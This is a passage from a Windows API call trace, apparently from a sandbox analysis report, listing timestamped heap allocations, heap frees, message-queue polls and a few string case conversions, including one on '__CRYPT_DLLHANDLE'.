lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0263.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0263.984] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.984] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0263.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0263.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.985] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.985] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0263.985] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0263.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0263.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.986] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.986] CharLowerBuffW (in: lpsz="byte[77360]", cchLength=0xb | out: lpsz="byte[77360]") returned 0xb [0263.986] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.987] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e30) returned 0xe50048 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0263.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0263.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0263.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0263.988] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.989] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0263.989] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0xe62e80 [0263.991] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0xe75cb8 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe62e80 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe75cb8 | out: hHeap=0x970000) returned 1 [0263.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.996] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0263.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0263.997] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0263.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0263.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0263.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0263.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0263.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0263.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0263.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0263.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0263.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0263.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0264.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12e2a) returned 0xe62e80 [0264.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe62e80 | out: hHeap=0x970000) returned 1 [0264.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.025] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0264.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.026] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.026] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.027] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.027] RtlAllocateHeap (HeapHandle=0x970000, 